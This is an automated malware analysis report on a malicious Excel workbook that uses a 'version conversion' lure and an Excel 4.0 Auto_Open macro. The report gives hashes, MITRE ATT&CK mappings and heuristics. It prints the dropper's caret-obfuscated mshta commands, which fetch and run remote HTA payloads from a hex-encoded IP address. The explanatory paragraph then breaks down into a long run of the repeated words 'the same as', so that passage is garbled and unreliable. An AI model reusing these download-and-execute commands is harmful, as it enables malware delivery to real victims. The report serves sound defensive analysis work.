Office (OLE) / .XLS malware analysis — malicious · 543f024d39da758f

MALICIOUS

Office (OLE) / .XLS

64.8 KB Created: 2022-01-17 17:40:35 Authoring application: Microsoft Excel

MD5: c3f0810ff66b330d1962f37c3df771a7 SHA-1: 913dc0addc2e48ab30d904636b6f3b13f9056019 SHA-256: 543f024d39da758f4284cc37375fa7b911db8f6092f5ed5cc3a176ec46655ac2

100 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 User Execution: Malicious File T1059.005 Command and Scripting Interpreter: Visual Basic for Applications T1566.001 Phishing: Spearphishing Attachment T1059.001 Command and Scripting Interpreter: PowerShell

The sample uses a 'version conversion' lure in the document body to trick the user into enabling macros. The embedded Excel 4.0 (XLM) macros utilize the Auto_Open trigger to execute a command line string. Specifically, the script executes 'cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/c.html' and 'cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html', where the caret symbols are used as escape characters for thecite the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the same as the

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `0807f652a36752efcd354ce3c536f2fe7ed4cd53a3ff1787c33acb378dda90a0`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1073 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.